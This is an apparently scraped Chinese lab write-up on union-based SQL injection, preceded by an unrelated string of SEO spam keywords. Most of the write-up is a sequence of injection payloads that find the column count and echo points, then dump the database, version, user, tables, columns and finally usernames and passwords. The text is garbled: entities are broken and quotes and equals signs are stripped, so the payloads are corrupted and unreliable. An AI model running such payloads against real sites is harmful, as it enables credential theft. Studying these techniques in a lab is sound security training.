做什么软件做网站效率最好,临沂企业建站模板,怎么用手机做网站服务器,网络运维需要懂什么技术第一题
联合查询
1#xff09;思路#xff1a;
有回显值
1.判断有无注入点
2.猜解列名数量
3.判断回显点
4.利用注入点进行信息收集
爆用户权限#xff0c;爆库#xff0c;爆版本号
爆表#xff0c;爆列#xff0c;爆账号密码
2#xff09;解题过程#xff1…第一题
联合查询
1思路
有回显值
1.判断有无注入点
2.猜解列名数量
3.判断回显点
4.利用注入点进行信息收集
爆用户权限爆库爆版本号
爆表爆列爆账号密码
2解题过程
?id1 and 11--和?id1 and 12--进行测试如果11页面显示正常和原页面一样并且12页面报错或者页面部分数据显示不正常那么可以确定此处为字符型注入。
判断为单引号注入且有回显点 猜解列名数量为3 ?id1order by 3-- 判断回显点23 ?id-1union select 1,2,3-- 联合注入进行信息收集
爆库、版本号、权限 ?id-1 union select 1,database(),version()-- ?id-1 union select 1,2user()-- 爆表 ?id-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schemasecurity-- 爆列 ?id-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_nameusers-- 爆账号密码 ?id-1 union select 1,2,(select group_concat(username,0x7e,password) from users)--
